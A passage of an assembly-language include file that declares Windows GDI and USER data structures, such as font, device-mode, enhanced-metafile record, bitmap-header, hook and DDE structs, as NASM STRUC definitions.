.elpBrushStyle RESD 1
.elpColor RESD 1
.elpHatch RESD 1
.elpNumEntries RESD 1
.elpStyleEntry RESD 1
ENDSTRUC
STRUC PALETTEENTRY
.peRed RESB 1
.peGreen RESB 1
.peBlue RESB 1
.peFlags RESB 1
ENDSTRUC
STRUC LOGPALETTE
.palVersion RESW 1
.palNumEntries RESW 1
.palPalEntry RESD 1
ENDSTRUC
STRUC LOGFONT
.lfHeight RESD 1
.lfWidth RESD 1
.lfEscapement RESD 1
.lfOrientation RESD 1
.lfWeight RESD 1
.lfItalic RESB 1
.lfUnderline RESB 1
.lfStrikeOut RESB 1
.lfCharSet RESB 1
.lfOutPrecision RESB 1
.lfClipPrecision RESB 1
.lfQuality RESB 1
.lfPitchAndFamily RESB 1
.lfFaceName RESB LF_FACESIZE
ENDSTRUC
STRUC NONCLIENTMETRICS
.cbSize RESD 1
.iBorderWidth RESD 1
.iScrollWidth RESD 1
.iScrollHeight RESD 1
.iCaptionWidth RESD 1
.iCaptionHeight RESD 1
.lfCaptionFont RESB LOGFONT_size
.iSMCaptionWidth RESD 1
.iSMCaptionHeight RESD 1
.lfSMCaptionFont RESB LOGFONT_size
.iMenuWidth RESD 1
.iMenuHeight RESD 1
.lfMenuFont RESB LOGFONT_size
.lfStatusFont RESB LOGFONT_size
.lfMessageFont RESB LOGFONT_size
ENDSTRUC
STRUC ENUMLOGFONT
.elfLogFont RESB LOGFONT_size
.elfFullName RESB 64 ; LF_FULLFACESIZE
.elfStyle RESB LF_FACESIZE
ENDSTRUC
STRUC PANOSE
.ulculture RESD 1
.bFamilyType RESB 1
.bSerifStyle RESB 1
.bWeight RESB 1
.bProportion RESB 1
.bContrast RESB 1
.bStrokeVariation RESB 1
.bArmStyle RESB 1
.bLetterform RESB 1
.bMidline RESB 1
.bXHeight RESB 1
ENDSTRUC
STRUC EXTLOGFONT
.elfLogFont RESB LOGFONT_size
.elfFullName RESB 64 ; LF_FULLFACESIZE
.elfStyle RESB LF_FACESIZE
.elfVersion RESD 1
.elfStyleSize RESD 1
.elfMatch RESD 1
.elfReserved RESD 1
.elfVendorId RESB 4 ; ELF_VENDOR_SIZE
.elfCulture RESD 1
.elfPanose RESB PANOSE_size
ENDSTRUC
STRUC DEVMODE
.dmDeviceName RESB 32 ; CCHDEVICENAME
.dmSpecVersion RESW 1
.dmDriverVersion RESW 1
.dmSize RESW 1
.dmDriverExtra RESW 1
.dmFields RESD 1
.dmOrientation RESW 1
.dmPaperSize RESW 1
.dmPaperiLength RESW 1
.dmPaperWidth RESW 1
.dmScale RESW 1
.dmCopies RESW 1
.dmDefaultSource RESW 1
.dmPrintQuality RESW 1
.dmColor RESW 1
.dmDuplex RESW 1
.dmYResolution RESW 1
.dmTTOption RESW 1
.dmCollate RESW 1
.dmFormName RESB CCHFORMNAME
.dmUnusedPadding RESW 1
.dmBitsPerPel RESD 1 ; DWORD
.dmPelsWidth RESD 1
.dmPelsHeight RESD 1
.dmDisplayFlags RESD 1
.dmDisplayFrequency RESD 1
ENDSTRUC
STRUC RGNDATAHEADER
.dwSize RESD 1
.iType RESD 1
.nCount RESD 1
.nRgnSize RESD 1
.rcBound RESB RECT_size
ENDSTRUC
STRUC RGNDATA
.rdh RESB RGNDATAHEADER_size
.Buffer RESB 1
ENDSTRUC
STRUC ABC
.abcA RESD 1
.abcB RESD 1
.abcC RESD 1
ENDSTRUC
STRUC ABCFLOAT ; three 4-byte FLOATs
.abcfA RESD 1
.abcfB RESD 1
.abcfC RESD 1
ENDSTRUC
STRUC OUTLINETEXTMETRIC
.otmSize RESD 1
.otmTextMetrics RESB TEXTMETRIC_size
.otmFiller RESB 1
.otmPanoseNumber RESB PANOSE_size
.otmfsSelection RESD 1
.otmfsType RESD 1
.otmsCharSlopeRise RESD 1
.otmsCharSlopeRun RESD 1
.otmItalicAngle RESD 1
.otmEMSquare RESD 1
.otmAscent RESD 1
.otmDescent RESD 1
.otmLineGap RESD 1
.otmsCapEmHeight RESD 1
.otmsXHeight RESD 1
.otmrcFontBox RESB RECT_size
.otmMacAscent RESD 1
.otmMacDescent RESD 1
.otmMacLineGap RESD 1
.otmusMinimumPPEM RESD 1
.otmptSubscriptSize RESB POINT_size
.otmptSubscriptOffset RESB POINT_size
.otmptSuperscriptSize RESB POINT_size
.otmptSuperscriptOffset RESB POINT_size
.otmsStrikeoutSize RESD 1
.otmsStrikeoutPosition RESD 1
.otmsUnderscorePosition RESD 1
.otmsUnderscoreSize RESD 1
.otmpFamilyName RESD 1
.otmpFaceName RESD 1
.otmpStyleName RESD 1
.otmpFullName RESD 1
ENDSTRUC
STRUC POLYTEXT
.x RESD 1
.y RESD 1
.n RESD 1
.lpStr RESD 1
.uiFlags RESD 1
.rcl RESB RECT_size
.pdx RESD 1
ENDSTRUC
STRUC FIXED
.fract RESW 1
.Value RESW 1
ENDSTRUC
STRUC MAT2
.eM11 RESD 1
.eM12 RESD 1
.eM21 RESD 1
.eM22 RESD 1
ENDSTRUC
STRUC GLYPHMETRICS
.gmBlackBoxX RESD 1
.gmBlackBoxY RESD 1
.gmptGlyphOrigin RESB POINT_size
.gmCellIncX RESW 1
.gmCellIncY RESW 1
ENDSTRUC
STRUC POINTFX
.x RESD 1
.y RESD 1
ENDSTRUC
STRUC TTPOLYCURVE
.wType RESW 1
.cpfx RESW 1
.apfx RESB POINTFX_size ; apfx[1]
ENDSTRUC
STRUC TTPOLYGONHEADER
.cb RESD 1
.dwType RESD 1
.pfxStart RESB POINTFX_size
ENDSTRUC
STRUC RASTERIZER_STATUS
.nSize RESW 1
.wFlags RESW 1
.nLanguageID RESW 1
ENDSTRUC
STRUC COLORADJUSTMENT
.caSize RESW 1
.caFlags RESW 1
.caIlluminantIndex RESW 1
.caRedGamma RESW 1
.caGreenGamma RESW 1
.caBlueGamma RESW 1
.caReferenceBlack RESW 1
.caReferenceWhite RESW 1
.caContrast RESW 1
.caBrightness RESW 1
.caColorfulness RESW 1
.caRedGreenTint RESW 1
ENDSTRUC
STRUC DOCINFO
.cbSize RESD 1
.lpszDocName RESD 1
.lpszOutput RESD 1
ENDSTRUC
STRUC KERNINGPAIR
.wFirst RESW 1
.wSecond RESW 1
.iKernAmount RESD 1
ENDSTRUC
STRUC emr
.iType RESD 1
.nSize RESD 1
ENDSTRUC
STRUC emrtext
.ptlReference RESB POINT_size
.nchars RESD 1
.offString RESD 1
.fOptions RESD 1
.ircl RESB RECT_size
.offDx RESD 1
ENDSTRUC
STRUC EMR
.iType RESD 1
.nSize RESD 1
ENDSTRUC
STRUC EMRABORTPATH
.emr RESB EMR_size
ENDSTRUC
STRUC EMRBEGINPATH
.emr RESB EMR_size
ENDSTRUC
STRUC EMRENDPATH
.emr RESB EMR_size
ENDSTRUC
STRUC EMRCLOSEFIGURE
.emr RESB EMR_size
ENDSTRUC
STRUC EMRFLATTENPATH
.emr RESB EMR_size
ENDSTRUC
STRUC EMRWIDENPATH
.emr RESB EMR_size
ENDSTRUC
STRUC EMRSETMETARGN
.emr RESB EMR_size
ENDSTRUC
STRUC EMRSAVEDC
.emr RESB EMR_size
ENDSTRUC
STRUC EMRREALIZEPALETTE
.emr RESB EMR_size
ENDSTRUC
STRUC EMRSELECTCLIPPATH
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETBKMODE
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETMAPMODE
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETPOLYFILLMODE
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETROP2
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETSTRETCHBLTMODE
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETTEXTALIGN
.emr RESB EMR_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETMITERLIMIT
.emr RESB EMR_size
.eMiterLimit RESD 1 ; FLOAT
ENDSTRUC
STRUC EMRRESTOREDC
.emr RESB EMR_size
.iRelative RESD 1
ENDSTRUC
STRUC EMRSETARCDIRECTION
.emr RESB EMR_size
.iArcDirection RESD 1
ENDSTRUC
STRUC EMRSETMAPPERFLAGS
.emr RESB EMR_size
.dwFlags RESD 1
ENDSTRUC
STRUC EMRSETTEXTCOLOR
.emr RESB EMR_size
.crColor RESD 1
ENDSTRUC
STRUC EMRSETBKCOLOR
.emr RESB EMR_size
.crColor RESD 1
ENDSTRUC
STRUC EMRSELECTOBJECT
.emr RESB EMR_size
.ihObject RESD 1
ENDSTRUC
STRUC EMRDELETEOBJECT
.emr RESB EMR_size
.ihObject RESD 1
ENDSTRUC
STRUC EMRSELECTPALETTE
.emr RESB EMR_size
.ihPal RESD 1
ENDSTRUC
STRUC EMRRESIZEPALETTE
.emr RESB EMR_size
.ihPal RESD 1
.cEntries RESD 1
ENDSTRUC
STRUC EMRSETPALETTEENTRIES
.emr RESB EMR_size
.ihPal RESD 1
.iStart RESD 1
.cEntries RESD 1
.aPalEntries RESD 1
ENDSTRUC
STRUC EMRSETCOLORADJUSTMENT
.emr RESB EMR_size
.ColorAdjustment RESB COLORADJUSTMENT_size
ENDSTRUC
STRUC EMRGDICOMMENT
.emr RESB EMR_size
.cbData RESD 1
.xData1 RESW 1
ENDSTRUC
STRUC EMREOF
.emr RESB EMR_size
.nPalEntries RESD 1
.offPalEntries RESD 1
.nSizeLast RESD 1
ENDSTRUC
STRUC EMRLINETO
.emr RESB EMR_size
.ptl RESB POINT_size
ENDSTRUC
STRUC EMRMOVETOEX
.emr RESB EMR_size
.ptl RESB POINT_size
ENDSTRUC
STRUC EMROFFSETCLIPRGN
.emr RESB EMR_size
.ptlOffset RESB POINT_size
ENDSTRUC
STRUC EMRFILLPATH
.emr RESB EMR_size
.rclBounds RESB RECT_size
ENDSTRUC
STRUC EMRSTROKEANDFILLPATH
.emr RESB EMR_size
.rclBounds RESB RECT_size
ENDSTRUC
STRUC EMRSTROKEPATH
.emr RESB EMR_size
.rclBounds RESB RECT_size
ENDSTRUC
STRUC EMREXCLUDECLIPRECT
.emr RESB EMR_size
.rclClip RESB RECT_size
ENDSTRUC
STRUC EMRINTERSECTCLIPRECT
.emr RESB EMR_size
.rclClip RESB RECT_size
ENDSTRUC
STRUC EMRSETVIEWPORTORGEX
.emr RESB EMR_size
.ptlOrigin RESB POINT_size
ENDSTRUC
STRUC EMRSETWINDOWORGEX
.emr RESB EMR_size
.ptlOrigin RESB POINT_size
ENDSTRUC
STRUC EMRSETBRUSHORGEX
.emr RESB EMR_size
.ptlOrigin RESB POINT_size
ENDSTRUC
STRUC EMRSETVIEWPORTEXTEX
.emr RESB EMR_size
.szlExtent RESB SIZEL_size
ENDSTRUC
STRUC EMRSETWINDOWEXTEX
.emr RESB EMR_size
.szlExtent RESB SIZEL_size
ENDSTRUC
STRUC EMRSCALEVIEWPORTEXTEX
.emr RESB EMR_size
.xNum RESD 1
.xDenom RESD 1
.yNum RESD 1
.yDenom RESD 1
ENDSTRUC
STRUC EMRSCALEWINDOWEXTEX
.emr RESB EMR_size
.xNum RESD 1
.xDenom RESD 1
.yNum RESD 1
.yDenom RESD 1
ENDSTRUC
STRUC EMRSETWORLDTRANSFORM
.emr RESB EMR_size
.xform RESB XFORM_size
ENDSTRUC
STRUC EMRMODIFYWORLDTRANSFORM
.emr RESB EMR_size
.xform RESB XFORM_size
.iMode RESD 1
ENDSTRUC
STRUC EMRSETPIXELV
.emr RESB EMR_size
.ptlPixel RESB POINT_size
.crColor RESD 1
ENDSTRUC
STRUC EMREXTFLOODFILL
.emr RESB EMR_size
.ptlStart RESB POINT_size
.crColor RESD 1
.iMode RESD 1
ENDSTRUC
STRUC EMRELLIPSE
.emr RESB EMR_size
.rclBox RESB RECT_size
ENDSTRUC
STRUC EMRRECTANGLE
.emr RESB EMR_size
.rclBox RESB RECT_size
ENDSTRUC
STRUC EMRROUNDRECT
.emr RESB EMR_size
.rclBox RESB RECT_size
.szlCorner RESB SIZEL_size
ENDSTRUC
STRUC EMRARC
.emr RESB EMR_size
.rclBox RESB RECT_size
.ptlStart RESB POINT_size
.ptlEnd RESB POINT_size
ENDSTRUC
STRUC EMRARCTO
.emr RESB EMR_size
.rclBox RESB RECT_size
.ptlStart RESB POINT_size
.ptlEnd RESB POINT_size
ENDSTRUC
STRUC EMRCHORD
.emr RESB EMR_size
.rclBox RESB RECT_size
.ptlStart RESB POINT_size
.ptlEnd RESB POINT_size
ENDSTRUC
STRUC EMRPIE
.emr RESB EMR_size
.rclBox RESB RECT_size
.ptlStart RESB POINT_size
.ptlEnd RESB POINT_size
ENDSTRUC
STRUC EMRANGLEARC
.emr RESB EMR_size
.ptlCenter RESB POINT_size
.nRadius RESD 1
.eStartAngle RESD 1 ; FLOAT
.eSweepAngle RESD 1 ; FLOAT
ENDSTRUC
STRUC EMRPOLYLINE
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cptl RESD 1
.aptl1 RESD 1
ENDSTRUC
STRUC EMRPOLYBEZIER
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cptl RESD 1
.aptl1 RESD 1
ENDSTRUC
STRUC EMRPOLYGON
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cptl RESD 1
.aptl1 RESD 1
ENDSTRUC
STRUC EMRPOLYBEZIERTO
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cptl RESD 1
.aptl1 RESD 1
ENDSTRUC
STRUC EMRPOLYLINE16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRPOLYBEZIER16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRPOLYGON16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRPOLYBEZIERTO16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRPOLYLINETO16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRPOLYDRAW
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cptl RESD 1
.aptl1 RESD 1
.abTypes1 RESW 1
ENDSTRUC
STRUC EMRPOLYDRAW16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts RESD 1
.abTypes RESW 1
ENDSTRUC
STRUC EMRPOLYPOLYLINE
.emr RESB EMR_size
.rclBounds RESB RECT_size
.nPolys RESD 1
.cptl RESD 1
.aPolyCounts RESD 1
.aptl RESD 1
ENDSTRUC
STRUC EMRPOLYPOLYGON
.emr RESB EMR_size
.rclBounds RESB RECT_size
.nPolys RESD 1
.cptl RESD 1
.aPolyCounts RESD 1
.aptl1 RESD 1
ENDSTRUC
STRUC EMRPOLYPOLYLINE16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.nPolys RESD 1
.cpts RESD 1
.aPolyCounts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRPOLYPOLYGON16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.nPolys RESD 1
.cpts RESD 1
.aPolyCounts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRINVERTRGN
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cbRgnData RESD 1
.RgnData1 RESW 1
ENDSTRUC
STRUC EMRPAINTRGN
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cbRgnData RESD 1
.RgnData1 RESW 1
ENDSTRUC
STRUC EMRFILLRGN
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cbRgnData RESD 1
.ihBrush RESD 1
.RgnData RESW 1
ENDSTRUC
STRUC EMRFRAMERGN
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cbRgnData RESD 1
.ihBrush RESD 1
.szlStroke RESB SIZEL_size
.RgnData1 RESW 1
ENDSTRUC
STRUC EMREXTSELECTCLIPRGN
.emr RESB EMR_size
.cbRgnData RESD 1
.iMode RESD 1
.RgnData RESW 1
ENDSTRUC
STRUC EMREXTTEXTOUT
.emr RESB EMR_size
.rclBounds RESB RECT_size
.iGraphicsMode RESD 1
.exScale RESD 1 ; FLOAT
.eyScale RESD 1 ; FLOAT
.emrtext RESB emrtext_size
ENDSTRUC
STRUC EMRBITBLT
.emr RESB EMR_size
.rclBounds RESB RECT_size
.xDest RESD 1
.yDest RESD 1
.cxDest RESD 1
.cyDest RESD 1
.dwRop RESD 1
.xSrc RESD 1
.ySrc RESD 1
.xformSrc RESB XFORM_size
.crBkColorSrc RESD 1
.iUsageSrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
ENDSTRUC
STRUC EMRSTRETCHBLT
.emr RESB EMR_size
.rclBounds RESB RECT_size
.xDest RESD 1
.yDest RESD 1
.cxDest RESD 1
.cyDest RESD 1
.dwRop RESD 1
.xSrc RESD 1
.ySrc RESD 1
.xformSrc RESB XFORM_size
.crBkColorSrc RESD 1
.iUsageSrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
.cxSrc RESD 1
.cySrc RESD 1
ENDSTRUC
STRUC EMRMASKBLT
.emr RESB EMR_size
.rclBounds RESB RECT_size
.xDest RESD 1
.yDest RESD 1
.cxDest RESD 1
.cyDest RESD 1
.dwRop RESD 1
.xSrc RESD 1
.ySrc RESD 1
.xformSrc RESB XFORM_size
.crBkColorSrc RESD 1
.iUsageSrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
.xMask RESD 1
.yMask RESD 1
.iUsageMask RESD 1
.offBmiMask RESD 1
.cbBmiMask RESD 1
.offBitsMask RESD 1
.cbBitsMask RESD 1
ENDSTRUC
STRUC EMRPLGBLT
.emr RESB EMR_size
.rclBounds RESB RECT_size
.aptlDest3 RESB POINT_size*3 ; aptlDest[3]
.xSrc RESD 1
.ySrc RESD 1
.cxSrc RESD 1
.cySrc RESD 1
.xformSrc RESB XFORM_size
.crBkColorSrc RESD 1
.iUsageSrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
.xMask RESD 1
.yMask RESD 1
.iUsageMask RESD 1
.offBmiMask RESD 1
.cbBmiMask RESD 1
.offBitsMask RESD 1
.cbBitsMask RESD 1
ENDSTRUC
STRUC EMRSETDIBITSTODEVICE
.emr RESB EMR_size
.rclBounds RESB RECT_size
.xDest RESD 1
.yDest RESD 1
.xSrc RESD 1
.ySrc RESD 1
.cxSrc RESD 1
.cySrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
.iUsageSrc RESD 1
.iStartScan RESD 1
.cScans RESD 1
ENDSTRUC
STRUC EMRSTRETCHDIBITS
.emr RESB EMR_size
.rclBounds RESB RECT_size
.xDest RESD 1
.yDest RESD 1
.xSrc RESD 1
.ySrc RESD 1
.cxSrc RESD 1
.cySrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
.iUsageSrc RESD 1
.dwRop RESD 1
.cxDest RESD 1
.cyDest RESD 1
ENDSTRUC
STRUC EMREXTCREATEFONTINDIRECT
.emr RESB EMR_size
.ihFont RESD 1
.elfw RESD 1
ENDSTRUC
STRUC EMRCREATEPALETTE
.emr RESB EMR_size
.ihPal RESD 1
.lgpl RESB LOGPALETTE_size
ENDSTRUC
STRUC EMRCREATEPEN
.emr RESB EMR_size
.ihPen RESD 1
.lopn RESB LOGPEN_size
ENDSTRUC
STRUC EMREXTCREATEPEN
.emr RESB EMR_size
.ihPen RESD 1
.offBmi RESD 1
.cbBmi RESD 1
.offBits RESD 1
.cbBits RESD 1
.elp RESB EXTLOGPEN_size
ENDSTRUC
STRUC EMRCREATEBRUSHINDIRECT
.emr RESB EMR_size
.ihBrush RESD 1
.lb RESB LOGBRUSH_size
ENDSTRUC
STRUC EMRCREATEMONOBRUSH
.emr RESB EMR_size
.ihBrush RESD 1
.iUsage RESD 1
.offBmi RESD 1
.cbBmi RESD 1
.offBits RESD 1
.cbBits RESD 1
ENDSTRUC
STRUC EMRCREATEDIBPATTERNBRUSHPT
.emr RESB EMR_size
.ihBrush RESD 1
.iUsage RESD 1
.offBmi RESD 1
.cbBmi RESD 1
.offBits RESD 1
.cbBits RESD 1
ENDSTRUC
STRUC BITMAPV4HEADER
.bV4Size RESD 1
.bV4Width RESD 1
.bV4Height RESD 1
.bV4Planes RESW 1
.bV4BitCount RESW 1
.bV4V4Compression RESD 1
.bV4SizeImage RESD 1
.bV4XPelsPerMeter RESD 1
.bV4YPelsPerMeter RESD 1
.bV4ClrUsed RESD 1
.bV4ClrImportant RESD 1
.bV4RedMask RESD 1
.bV4GreenMask RESD 1
.bV4BlueMask RESD 1
.bV4AlphaMask RESD 1
.bV4CSType RESD 1
.bV4Endpoints RESD 1
.bV4GammaRed RESD 1
.bV4GammaGreen RESD 1
.bV4GammaBlue RESD 1
ENDSTRUC
STRUC FONTSIGNATURE
.fsUsb4 RESD 1
.fsCsb2 RESD 1
ENDSTRUC
STRUC CHARSETINFO
.ciCharset RESD 1
.ciACP RESD 1
.xlfs RESD 1
ENDSTRUC
STRUC LOCALESIGNATURE
.lsUsb4 RESD 1
.lsCsbDefault RESD 1
.lsCsbSupported RESD 1
ENDSTRUC
STRUC NEWTEXTMETRICEX
.ntmTm RESD 1
.ntmFontSig RESD 1
ENDSTRUC
STRUC ENUMLOGFONTEX
.elfLogFont RESD 1
.elfFullName RESB 1
.elfStyle RESB 1
.elfScript RESB 1
ENDSTRUC
STRUC GCP_RESULTS
.lStructSize RESD 1
.lpOutString RESD 1
.lpOrder RESD 1
.lpDX RESD 1
.lpCaretPos RESD 1
.lpClass RESD 1
.lpGlyphs RESD 1
.nGlyphs RESD 1
.nMaxFit RESD 1
ENDSTRUC
STRUC CIEXYZ
.ciexyzX RESD 1
.ciexyzY RESD 1
.ciexyzZ RESD 1
ENDSTRUC
STRUC CIEXYZTRIPLE
.ciexyzRed RESD 1
.ciexyzGreen RESD 1
.ciexyzBlue RESD 1
ENDSTRUC
STRUC LOGCOLORSPACE
.lcsSignature RESD 1
.lcsVersion RESD 1
.lcsSize RESD 1
.lcsCSType RESD 1
.lcsIntent RESD 1
.lcsEndPoints RESD 1
.lcsGammaRed RESD 1
.lcsGammaGreen RESD 1
.lcsGammaBlue RESD 1
.lcsFileName RESB MAX_PATH
ENDSTRUC
STRUC EMRSELECTCOLORSPACE
.emr RESB EMR_size
.ihCS RESD 1
ENDSTRUC
STRUC EMRCREATECOLORSPACE
.emr RESB EMR_size
.ihCS RESD 1
.lcs RESD 1
ENDSTRUC
STRUC CBTACTIVATESTRUCT
.fMouse RESD 1
.hWndActive RESD 1
ENDSTRUC
STRUC EVENTMSG
.message RESD 1
.paramL RESD 1
.paramH RESD 1
.time RESD 1
.hwnd RESD 1
ENDSTRUC
STRUC CWPSTRUCT
.lParam RESD 1
.wParam RESD 1
.message RESD 1
.hwnd RESD 1
ENDSTRUC
STRUC DEBUGHOOKINFO
.hModuleHook RESD 1
.Reserved RESD 1
.lParam RESD 1
.wParam RESD 1
.code RESD 1
ENDSTRUC
STRUC MOUSEHOOKSTRUCT
.pt RESB POINT_size
.hwnd RESD 1
.wHitTestCode RESD 1
.dwExtraInfo RESD 1
ENDSTRUC
STRUC MINMAXINFO
.ptReserved RESB POINT_size
.ptMaxSize RESB POINT_size
.ptMaxPosition RESB POINT_size
.ptMinTrackSize RESB POINT_size
.ptMaxTrackSize RESB POINT_size
ENDSTRUC
STRUC COPYDATASTRUCT
.dwData RESD 1
.cbData RESD 1
.lpData RESD 1
ENDSTRUC
STRUC WINDOWPOS
.hwnd RESD 1
.hWndInsertAfter RESD 1
.x RESD 1
.y RESD 1
.lx RESD 1
.ly RESD 1
.flags RESD 1
ENDSTRUC
STRUC ACCEL
.fVirt RESB 1
.key RESW 1
.cmd RESW 1
ENDSTRUC
STRUC PAINTSTRUCT
.hdc RESD 1
.fErase RESD 1
.rcPaint RESB RECT_size
.fRestore RESD 1
.fIncUpdate RESD 1
.rgbReserved RESB 32
ENDSTRUC
STRUC CREATESTRUCT
.lpCreateParams RESD 1
.hInstance RESD 1
.hMenu RESD 1
.hWndParent RESD 1
.ly RESD 1
.lx RESD 1
.y RESD 1
.x RESD 1
.style RESD 1
.lpszName RESD 1
.lpszClass RESD 1
.ExStyle RESD 1
ENDSTRUC
STRUC CBT_CREATEWND
.lpcs RESD 1
.hWndInsertAfter RESD 1
ENDSTRUC
STRUC WINDOWPLACEMENT
.iLength RESD 1
.flags RESD 1
.showCmd RESD 1
.ptMinPosition RESB POINT_size
.ptMaxPosition RESB POINT_size
.rcNormalPosition RESB RECT_size
ENDSTRUC
STRUC MEASUREITEMSTRUCT
.CtlType RESD 1
.CtlID RESD 1
.itemID RESD 1
.itemWidth RESD 1
.itemHeight RESD 1
.itemData RESD 1
ENDSTRUC
STRUC DRAWITEMSTRUCT
.CtlType RESD 1
.CtlID RESD 1
.itemID RESD 1
.itemAction RESD 1
.itemState RESD 1
.hwndItem RESD 1
.hDC RESD 1
.rcItem RESB RECT_size
.itemData RESD 1
ENDSTRUC
STRUC DELETEITEMSTRUCT
.CtlType RESD 1
.CtlID RESD 1
.itemID RESD 1
.hwndItem RESD 1
.itemData RESD 1
ENDSTRUC
STRUC COMPAREITEMSTRUCT
.CtlType RESD 1
.CtlID RESD 1
.hwndItem RESD 1
.itemID1 RESD 1
.itemData1 RESD 1
.itemID2 RESD 1
.itemData2 RESD 1
ENDSTRUC
STRUC DLGTEMPLATE
.style RESD 1
.dwExtendedStyle RESD 1
.cdit RESW 1
.x RESW 1
.y RESW 1
.lx RESW 1
.ly RESW 1
ENDSTRUC
STRUC DLGITEMTEMPLATE
.style RESD 1
.dwExtendedStyle RESD 1
.x RESW 1
.y RESW 1
.lx RESW 1
.ly RESW 1
.id RESW 1
ENDSTRUC
STRUC MENUITEMTEMPLATEHEADER
.versionNumber RESW 1
.loffset RESW 1
ENDSTRUC
STRUC MENUITEMTEMPLATE
.mtOption RESW 1
.mtID RESW 1
.mtString RESB 1
ENDSTRUC
STRUC ICONINFO
.fIcon RESD 1
.xHotspot RESD 1
.yHotspot RESD 1
.hbmMask RESD 1
.hbmColor RESD 1
ENDSTRUC
STRUC MDICREATESTRUCT
.szClass RESD 1
.szTitle RESD 1
.hOwner RESD 1
.x RESD 1
.y RESD 1
.lx RESD 1
.ly RESD 1
.style RESD 1
.lParam RESD 1
ENDSTRUC
STRUC CLIENTCREATESTRUCT
.hWindowMenu RESD 1
.idFirstChild RESD 1
ENDSTRUC
STRUC MULTIKEYHELP
.mkSize RESD 1
.mkKeylist RESB 1
.szKeyphrase RESB 253
ENDSTRUC
STRUC HELPWININFO
.wStructSize RESD 1
.x RESD 1
.y RESD 1
.lx RESD 1
.ly RESD 1
.wMax RESD 1
.rgchMember RESB 2
ENDSTRUC
STRUC DDEACK
.bAppReturnCode RESW 1
.Reserved RESW 1
.fbusy RESW 1
.fack RESW 1
ENDSTRUC
STRUC DDEADVISE
.Reserved RESW 1
.fDeferUpd RESW 1
.fAckReq RESW 1
.cfFormat RESW 1
ENDSTRUC
STRUC DDEDATA
.unused RESW 1
.fresponse RESW 1
.fRelease RESW 1
.Reserved RESW 1
.fAckReq RESW 1
.cfFormat RESW 1
.Value1 RESB 1
ENDSTRUC
STRUC DDEPOKE
.unused RESW 1
.fRelease RESW 1
.fReserved RESW 1
.cfFormat RESW 1
.Value1 RESB 1
ENDSTRUC
STRUC DDELN
.unused RESW 1
.fRelease RESW 1
.fDeferUpd RESW 1
.fAckReq RESW 1
.cfFormat RESW 1
ENDSTRUC
STRUC DDEUP
.unused RESW 1
.fAck RESW 1
.fRelease RESW 1
.fReserved RESW 1
.fAckReq RESW 1
.cfFormat RESW 1
.xRGB1 RESB 1
ENDSTRUC
STRUC HSZPAIR
.hszSvc RESD 1
.hszTopic RESD 1
ENDSTRUC
STRUC SECURITY_QUALITY_OF_SERVICE
.iLength RESD 1
.Impersonationlevel RESW 1
.ContextTrackingMode RESW 1
.EffectiveOnly RESD 1
ENDSTRUC
STRUC CONVCONTEXT
.cb RESD 1
.wFlags RESD 1
.wCountryID RESD 1
.iCodePage RESD 1
.dwLangID RESD 1
.dwSecurity RESD 1
.qos RESD 1
ENDSTRUC
STRUC CONVINFO
.cb RESD 1
.hUser RESD 1
.hConvPartner RESD 1
.hszSvcPartner RESD 1
.hszServiceReq RESD 1
.hszTopic RESD 1
.hszItem RESD 1
.wFmt RESD 1
.wType RESD 1
.wStatus RESD 1
.wConvst RESD 1
.wLastError RESD 1
.hConvList RESD 1
.ConvCtxt RESD 1
.hwnd RESD 1
.hwndPartner RESD 1
ENDSTRUC
STRUC DDEML_MSG_HOOK_DATA
.uiLo RESD 1
.uiHi RESD 1
.cbData RESD 1
.xData RESD 1
ENDSTRUC
STRUC MONMSGSTRUCT
.cb RESD 1
.hwndTo RESD 1
.dwTime RESD 1
.htask RESD 1
.wMsg RESD 1
.wParam RESD 1
.lParam RESD 1
.dmhd RESD 1
ENDSTRUC
STRUC MONCBSTRUCT
.cb RESD 1
.dwTime RESD 1
.htask RESD 1
.dwRet RESD 1
.wType RESD 1
.wFmt RESD 1
.hConv RESD 1
.hsz1 RESD 1
.hsz2 RESD 1
.hData RESD 1
.dwData1 RESD 1
